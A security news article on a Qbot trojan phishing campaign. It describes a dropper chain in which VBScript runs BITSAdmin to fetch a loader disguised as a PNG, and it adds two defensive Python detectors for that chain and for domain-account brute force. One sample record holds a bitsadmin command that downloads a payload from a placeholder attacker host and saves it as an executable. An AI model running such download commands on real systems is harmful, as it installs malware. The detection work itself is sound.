Qbot, an information-stealing trojan that has been around for 10 years, has resurfaced with a new phishing-based infection technique that evades anti-spam defenses.
Varonis Security Research spotted the new global Qbot campaign in March. Researchers said they positively identified 2,726 victims, based on analysis of one of the attacker's servers, but they suspect the actual number of victims is much higher. Researchers at JASK released their own analysis of the latest iteration of the Qbot malware on Tuesday.
Qbot, also known as QakBot, is known for its polymorphic behavior and its worm-like tendencies, such as self-replicating via shared drives and removable media. This time around, Qbot has been spreading through a phishing campaign targeting U.S. corporations as well as victims in Europe, Asia and South America.
The delivery mechanism for this variant of Qbot is a phishing email containing a link to what appears to be an online document. The emails purport to be replies within an existing email thread, posing as a continuation of pre-existing business correspondence, according to JASK.
“This email was not blocked by an anti-spam gateway. It was a context-aware targeted response to an existing email thread,” wrote Greg Longo, senior threat analyst with JASK, in an email-based interview. He said the goal of the attacks is to steal proprietary financial information, including bank account credentials.
The infection chain itself is typical. A phishing email arrives with a link to a Microsoft OneDrive file that delivers a VBScript (Microsoft Visual Basic Scripting Edition) inside a compressed Zip archive. If the archive is opened and the script is run, it executes under Wscript.exe, the native Windows Script Host, which in turn spawns the legitimate BITSAdmin Windows utility to download the Qbot loader, a file named “august.png,” from the attacker's server. The image extension is cosmetic; the file is the malware loader, not a picture.
“This two-stage process is a common attack vector for actors to bypass security controls. Some security technologies will detonate links in an email so including a link to a ZIP archive is likely to get through (as opposed to a link straight to the malware),” Longo wrote.
Varonis Security Research noted that previous Qbot attacks used malicious Word document macros as the first stage. Researchers also noted that this variant is unusual in using BITSAdmin to download the loader; this appears to be new behavior, as previous samples used PowerShell. According to Microsoft's description, “BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.” Because BITSAdmin is a signed, built-in utility, its network activity does not stand out the way an unknown binary's would, which is precisely why a loader would use it.
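The chain described above (Windows Script Host spawning BITSAdmin to pull a payload disguised with an image extension) is a good candidate for a process-creation detection. The following is an added example, not code from the Varonis or JASK reports: it walks constructed Sysmon-style process-creation records and flags a `bitsadmin /transfer` job whose parent is a script host, or whose remote file carries an image extension while the local destination is executable. The record layout, the hostname `attacker.invalid` (a placeholder in the reserved `.invalid` TLD) and the sample events are all assumptions made for the example.

```python
"""Flag the script-host -> BITSAdmin download chain in process-creation telemetry.

Added example built on constructed Sysmon Event ID 1-style records; it is not the
detection logic of either research team and assumes the field layout below.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Script hosts and shells that a VBScript or similar dropper would run under.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe"}
# An image extension on the remote side paired with an executable extension on the
# local side is the "august.png" masquerading trick described above.
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}
EXEC_EXTS = {".exe", ".dll", ".scr", ".vbs", ".js", ".ps1"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Minimal subset of a Sysmon process-creation record (assumed layout)."""
    pid: int
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    pid: int
    reasons: list = field(default_factory=list)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _extension(path):
    name = _basename(path)
    return name[name.rfind("."):] if "." in name else ""


def analyze(events):
    """Return one Alert per suspicious bitsadmin /transfer invocation."""
    alerts = []
    for ev in events:
        if _basename(ev.image) != "bitsadmin.exe":
            continue
        if "/transfer" not in ev.command_line.lower():
            continue
        reasons = []
        parent = _basename(ev.parent_image)
        if parent in SCRIPT_HOSTS:
            reasons.append(f"bitsadmin /transfer spawned by script host {parent}")
        match = URL_RE.search(ev.command_line)
        if match:
            remote_ext = _extension(urlparse(match.group(0)).path)
            # The local destination is the last argument of a /transfer job.
            local_ext = _extension(ev.command_line.split()[-1])
            if remote_ext in IMAGE_EXTS and local_ext in EXEC_EXTS:
                reasons.append(f"remote '{remote_ext}' saved as '{local_ext}'")
            elif remote_ext in IMAGE_EXTS:
                reasons.append(f"image file {remote_ext} fetched via BITS")
        if reasons:
            alerts.append(Alert(ev.pid, reasons))
    return alerts


# Constructed sample records for the example; not real telemetry.
SAMPLE_EVENTS = [
    # Benign: a service pulling an update through BITS.
    ProcEvent(1001, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer wu /download /priority normal "
              r"https://update.example.com/patch.msu C:\Temp\patch.msu"),
    # Modelled on the chain above: wscript.exe running the dropper, BITSAdmin
    # fetching a ".png" that lands on disk as an executable. The host is a
    # placeholder in the reserved .invalid TLD, not a real C2 address.
    ProcEvent(1002, r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer job1 /download /priority high "
              r"http://attacker.invalid/august.png C:\Users\Public\august.exe"),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Only the wscript.exe-parented record produces an alert, with two reasons; the svchost.exe update job is ignored because neither its parent nor its file extensions match. In production the same two conditions map directly onto a SIEM rule keyed on `ParentImage` and `CommandLine`.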
Post infection, according to Varonis, once “the malware compromises a domain account, it enumerates the ‘Domain Users’ group and brute forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead.”
The goal of the malware is to siphon money from victims' accounts by stealing credentials. It uses keylogging to capture credentials and cookies, and it uses API hooking. With hooking, “the main payload injects to all the processes in the system with a code that hooks API calls and searches for financial/banking string the malware extracts the data, credentials, or session cookies from the process and uploads it to the attacker,” Varonis wrote.
Since 2009, when Qbot launched its first assault on computer networks, the malware has never completely vanished; there have been sporadic reports of Qbot variants causing limited infections. In 2016, the criminals behind the trojan repurposed the original Qbot source code and tweaked it with the ability to regenerate itself on an infected host every 24 hours. In 2017 the malware was spotted using a new tactic, locking users out of their Active Directory accounts by cycling through user and domain credentials in a dictionary attack.
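The brute force against an enumerated Domain Users group, and the resulting account lockouts noted from the 2017 variant, leave a characteristic trace in the Windows Security log: one source host generating failed logons (Event ID 4625) against many distinct accounts in a short window, often followed by lockout events (Event ID 4740). The following is an added example, not code from either research team: it parses constructed log lines in an assumed `timestamp event_id source_host target_account` layout, flags any source that fails logons against at least `min_accounts` distinct accounts inside the window, and lists the accounts that were locked out as a result.

```python
"""Spot one host brute-forcing many domain accounts in Windows Security events.

Added example over constructed log lines; the whitespace-separated layout
(timestamp, event id, source host, target account) is an assumption made here.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

FAILED_LOGON = 4625
ACCOUNT_LOCKOUT = 4740


@dataclass
class LogonEvent:
    ts: datetime
    event_id: int
    source: str   # workstation the attempt came from (Caller Computer for 4740)
    target: str   # account being tried or locked


def parse(text):
    """Parse the constructed 'timestamp event_id source target' lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, source, target = line.split()
        events.append(LogonEvent(datetime.fromisoformat(ts), int(event_id),
                                 source, target))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_host: accounts} for hosts that failed logons against
    at least min_accounts distinct accounts within any sliding window."""
    by_source = defaultdict(list)
    for ev in events:
        if ev.event_id == FAILED_LOGON:
            by_source[ev.source].append(ev)
    findings = {}
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):
            # Advance the window start until the span fits inside `window`.
            while evs[end].ts - evs[start].ts > window:
                start += 1
            accounts = {e.target for e in evs[start:end + 1]}
            if len(accounts) >= min_accounts and \
                    len(accounts) > len(findings.get(source, ())):
                findings[source] = accounts
    return findings


def locked_accounts(events):
    """Accounts that hit the lockout threshold during the brute force."""
    return sorted({e.target for e in events if e.event_id == ACCOUNT_LOCKOUT})


# Constructed sample log. WS07 plays the compromised host walking through an
# enumerated user list; WS12 is a user mistyping their own password twice.
SAMPLE_LOG = """\
2019-03-12T09:00:01 4625 WS07 alice
2019-03-12T09:00:03 4625 WS07 bob
2019-03-12T09:00:05 4625 WS07 carol
2019-03-12T09:00:07 4625 WS07 dave
2019-03-12T09:00:09 4625 WS07 erin
2019-03-12T09:00:11 4625 WS07 frank
2019-03-12T09:00:12 4740 WS07 carol
2019-03-12T09:00:13 4740 WS07 dave
2019-03-12T09:15:00 4625 WS12 alice
2019-03-12T09:15:20 4625 WS12 alice
"""

if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    for host, accounts in detect_spray(evs).items():
        print(f"{host}: failed logons against {len(accounts)} accounts: "
              f"{sorted(accounts)}")
    print("locked out:", locked_accounts(evs))
```

Only WS07 is reported, with six distinct accounts inside a two-minute span; WS12's repeated failures against a single account fall below the threshold, which is the distinction that separates a credential brute force from an ordinary forgotten password. The sliding window keys on distinct target accounts per source rather than on raw failure counts, so a slow, spread-out attack still needs to stay under the threshold per window to evade it.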